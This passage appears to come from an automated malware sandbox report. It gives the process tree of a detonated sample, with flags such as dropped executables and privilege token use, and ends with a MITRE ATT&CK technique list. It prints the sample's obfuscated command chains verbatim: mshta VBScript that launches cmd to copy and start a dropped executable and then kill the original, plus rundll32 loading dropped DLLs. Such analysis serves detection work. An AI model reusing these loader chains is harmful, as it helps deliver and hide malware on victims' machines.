        findstr /V /R "^HlGEvpOWJOEhLjtMCMDsxiaRDGubGurupaMHjGXUgfrcGybsXUFbdIsmSOwQrdfCLnrzmbAVPJrtrXlnpOAMBGPBqjObFuRXZBJowtRmxKIHEjcVEDHgPDwyIBahIedISyy$" Passa.xll
        7⤵
        
        PID:9680
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.com
        
        Tra.exe.com o
        7⤵
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:4412
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.com o
        8⤵
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:6808
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.com o
        9⤵
        
        PID:10728
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping localhost
        7⤵
        Runs ping.exe
        
        PID:3664
- - C:\Program Files (x86)\SmartPDF\SmartPDF\lg.exe
    "C:\Program Files (x86)\SmartPDF\SmartPDF\lg.exe"
    3⤵
    PID:1964
  - - C:\Program Files (x86)\SmartPDF\SmartPDF\lg.exe
      "C:\Program Files (x86)\SmartPDF\SmartPDF\lg.exe" -a
      4⤵
      PID:6748
- - C:\Program Files (x86)\SmartPDF\SmartPDF\PBrowFile15.exe
    "C:\Program Files (x86)\SmartPDF\SmartPDF\PBrowFile15.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:3336
  - - C:\Users\Admin\AppData\Roaming\8500963.exe
      "C:\Users\Admin\AppData\Roaming\8500963.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:7164
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 7164 -s 2356
        5⤵
        Program crash
        
        PID:10232
  - - C:\Users\Admin\AppData\Roaming\1234599.exe
      "C:\Users\Admin\AppData\Roaming\1234599.exe"
      4⤵
      Suspicious behavior: SetClipboardViewer
      PID:7136
  - - C:\Users\Admin\AppData\Roaming\1322172.exe
      "C:\Users\Admin\AppData\Roaming\1322172.exe"
      4⤵
      PID:7020
  - - C:\Users\Admin\AppData\Roaming\4289139.exe
      "C:\Users\Admin\AppData\Roaming\4289139.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:7296
  - - C:\Users\Admin\AppData\Roaming\1149346.exe
      "C:\Users\Admin\AppData\Roaming\1149346.exe"
      4⤵
      PID:7956
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7956 -s 2408
        5⤵
        Program crash
        
        PID:8864

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 2144 -ip 2144
1⤵
PID:1980

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
1⤵
- Modifies data under HKEY_USERS
PID:1584

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c TYpE "C:\Users\Admin\Documents\K881cE9ZARVUqncSaZBmTZq6.exe" > KRkNvH~YgUUt9O.exE && STarT KRKNvH~yGuUT9O.eXE -pA1IQsAATOS0kxrmeOcrgfdjncUG & iF "" == "" for %N In ("C:\Users\Admin\Documents\K881cE9ZARVUqncSaZBmTZq6.exe" ) do taskkill -F /Im "%~nXN"
1⤵
PID:1340
- C:\Users\Admin\AppData\Local\Temp\KRkNvH~YgUUt9O.exE
  KRKNvH~yGuUT9O.eXE -pA1IQsAATOS0kxrmeOcrgfdjncUG
  2⤵
  - Executes dropped EXE
  PID:4124
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\System32\mshta.exe" VBScRipT: CLOSe ( CreATEoBjECT ("wscrIpt.SheLL" ). RUn ( "C:\Windows\system32\cmd.exe /c TYpE ""C:\Users\Admin\AppData\Local\Temp\KRkNvH~YgUUt9O.exE"" > KRkNvH~YgUUt9O.exE && STarT KRKNvH~yGuUT9O.eXE -pA1IQsAATOS0kxrmeOcrgfdjncUG & iF ""-pA1IQsAATOS0kxrmeOcrgfdjncUG "" == """" for %N In ( ""C:\Users\Admin\AppData\Local\Temp\KRkNvH~YgUUt9O.exE"" ) do taskkill -F /Im ""%~nXN"" " , 0, True ) )
    3⤵
    PID:1760
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c TYpE "C:\Users\Admin\AppData\Local\Temp\KRkNvH~YgUUt9O.exE" > KRkNvH~YgUUt9O.exE && STarT KRKNvH~yGuUT9O.eXE -pA1IQsAATOS0kxrmeOcrgfdjncUG & iF "-pA1IQsAATOS0kxrmeOcrgfdjncUG " == "" for %N In ("C:\Users\Admin\AppData\Local\Temp\KRkNvH~YgUUt9O.exE" ) do taskkill -F /Im "%~nXN"
      4⤵
      PID:5520
- - C:\Windows\SysWOW64\rundll32.exe
    "C:\Windows\System32\rundll32.exe" .\p_ZPP.J p
    3⤵
    PID:2800
- C:\Windows\SysWOW64\taskkill.exe
  taskkill -F /Im "K881cE9ZARVUqncSaZBmTZq6.exe"
  2⤵
  - Kills process with taskkill
  PID:1500

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 1176 -ip 1176
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:892

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 1428 -ip 1428
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:968

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2464 -ip 2464
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3572

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1868 -ip 1868
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4896

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 1636 -ip 1636
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2952

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:1956

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 1684 -ip 1684
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3160

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2476 -ip 2476
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:940

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:5584
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:3920
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3920 -s 460
    3⤵
    - Program crash
    PID:3528

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3920 -ip 3920
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1980

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 5176 -ip 5176
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4272

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 6624 -ip 6624
1⤵
PID:6700

C:\Windows\system32\rUNdlL32.eXe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
1⤵
- Process spawned unexpected child process
PID:5780
- C:\Windows\SysWOW64\rundll32.exe
  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
  2⤵
  - Executes dropped EXE
  PID:2624
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 452
    3⤵
    - Program crash
    PID:8264
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 452
    3⤵
    - Program crash
    PID:8244

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:7304

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 2624 -ip 2624
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 7452 -ip 7452
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7272

C:\Users\Admin\AppData\Local\Temp\is-GI0DB.tmp\wGO9_je9uGisMCfoS9jBScNe.tmp
"C:\Users\Admin\AppData\Local\Temp\is-GI0DB.tmp\wGO9_je9uGisMCfoS9jBScNe.tmp" /SL5="$702FE,138429,56832,C:\Users\Admin\Documents\wGO9_je9uGisMCfoS9jBScNe.exe"
1⤵
PID:8544
- C:\Users\Admin\AppData\Local\Temp\is-FOLMF.tmp\Setup.exe
  "C:\Users\Admin\AppData\Local\Temp\is-FOLMF.tmp\Setup.exe" /Verysilent
  2⤵
  - Drops file in Program Files directory
  PID:9916

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBScRipT: CLOSe ( CreATEoBjECT ("wscrIpt.SheLL" ). RUn ( "C:\Windows\system32\cmd.exe /c TYpE ""C:\Users\Admin\Documents\rb_wOIqb51LNITuJnWG11Epv.exe"" > KRkNvH~YgUUt9O.exE && STarT KRKNvH~yGuUT9O.eXE -pA1IQsAATOS0kxrmeOcrgfdjncUG & iF """" == """" for %N In ( ""C:\Users\Admin\Documents\rb_wOIqb51LNITuJnWG11Epv.exe"" ) do taskkill -F /Im ""%~nXN"" " , 0, True ) )
1⤵
PID:8940
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /c TYpE "C:\Users\Admin\Documents\rb_wOIqb51LNITuJnWG11Epv.exe" > KRkNvH~YgUUt9O.exE && STarT KRKNvH~yGuUT9O.eXE -pA1IQsAATOS0kxrmeOcrgfdjncUG & iF "" == "" for %N In ("C:\Users\Admin\Documents\rb_wOIqb51LNITuJnWG11Epv.exe" ) do taskkill -F /Im "%~nXN"
  2⤵
  PID:8564
- - C:\Users\Admin\AppData\Local\Temp\KRkNvH~YgUUt9O.exE
    KRKNvH~yGuUT9O.eXE -pA1IQsAATOS0kxrmeOcrgfdjncUG
    3⤵
    PID:6308
  - - C:\Windows\SysWOW64\rundll32.exe
      "C:\Windows\System32\rundll32.exe" .\p_ZPP.J p
      4⤵
      PID:7456
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -F /Im "rb_wOIqb51LNITuJnWG11Epv.exe"
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:8900

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 736 -p 1896 -ip 1896
1⤵
PID:7676

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:8456

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 700 -p 1876 -ip 1876
1⤵
PID:5224

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 744 -p 8316 -ip 8316
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:9188

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 7960 -ip 7960
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2408

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 1488 -ip 1488
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:8568

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 500 -p 4852 -ip 4852
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:8764

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 6052 -ip 6052
1⤵
PID:7444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 816 -p 8468 -ip 8468
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6636

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 572 -ip 572
1⤵
PID:8920

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 824 -p 5196 -ip 5196
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:8332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 836 -p 5492 -ip 5492
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6464

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 808 -p 5292 -ip 5292
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2616

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 8656 -ip 8656
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:9564

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBScRipT: CLOSe ( CreATEoBjECT ("wscrIpt.SheLL" ). RUn ( "C:\Windows\system32\cmd.exe /c TYpE ""C:\Users\Admin\AppData\Local\Temp\KRkNvH~YgUUt9O.exE"" > KRkNvH~YgUUt9O.exE && STarT KRKNvH~yGuUT9O.eXE -pA1IQsAATOS0kxrmeOcrgfdjncUG & iF ""-pA1IQsAATOS0kxrmeOcrgfdjncUG "" == """" for %N In ( ""C:\Users\Admin\AppData\Local\Temp\KRkNvH~YgUUt9O.exE"" ) do taskkill -F /Im ""%~nXN"" " , 0, True ) )
1⤵
PID:1896
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /c TYpE "C:\Users\Admin\AppData\Local\Temp\KRkNvH~YgUUt9O.exE" > KRkNvH~YgUUt9O.exE && STarT KRKNvH~yGuUT9O.eXE -pA1IQsAATOS0kxrmeOcrgfdjncUG & iF "-pA1IQsAATOS0kxrmeOcrgfdjncUG " == "" for %N In ("C:\Users\Admin\AppData\Local\Temp\KRkNvH~YgUUt9O.exE" ) do taskkill -F /Im "%~nXN"
  2⤵
  PID:10160

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 2456 -ip 2456
1⤵
PID:7676

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:5352
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  - Loads dropped DLL
  PID:7392
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 7392 -s 452
    3⤵
    - Program crash
    PID:8356

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 200 -p 7392 -ip 7392
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:8016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1896 -ip 1896
1⤵
PID:6020

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 7564 -ip 7564
1⤵
PID:10484

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 408 -p 6184 -ip 6184
1⤵
PID:11188

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 412 -p 7164 -ip 7164
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5472

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 836 -p 7436 -ip 7436
1⤵
PID:9772

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 7956 -ip 7956
1⤵
PID:11200

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1940 -ip 1940
1⤵
PID:11060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 9780 -ip 9780
1⤵
PID:5744

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 652 -p 4988 -ip 4988
1⤵
PID:8864

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 452 -p 9500 -ip 9500
1⤵
PID:8860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 576 -ip 576
1⤵
PID:10164

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 9912 -ip 9912
1⤵
PID:1048

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 512 -p 10340 -ip 10340
1⤵
PID:4628

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 760 -p 3000 -ip 3000
1⤵
PID:2068

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 836 -p 5700 -ip 5700
1⤵
PID:10720

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 760 -p 10772 -ip 10772
1⤵
PID:8180

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 756 -p 6640 -ip 6640
1⤵
PID:7040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 808 -p 8612 -ip 8612
1⤵
PID:6272

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 756 -p 6404 -ip 6404
1⤵
PID:6120

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 7604 -ip 7604
1⤵
PID:4148

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 11672 -ip 11672
1⤵
PID:11864

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 780 -p 1616 -ip 1616
1⤵
PID:912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 748 -p 6928 -ip 6928
1⤵
PID:10100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 744 -p 9492 -ip 9492
1⤵
PID:13656

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 736 -p 13116 -ip 13116
1⤵
PID:4612

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 11760 -ip 11760
1⤵
PID:13648

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 6876 -ip 6876
1⤵
PID:12516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 748 -p 11108 -ip 11108
1⤵
PID:12988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 11916 -ip 11916
1⤵
PID:4508

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Disabling Security Tools

T1089

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

Remote System Discovery

T1018

System Information Discovery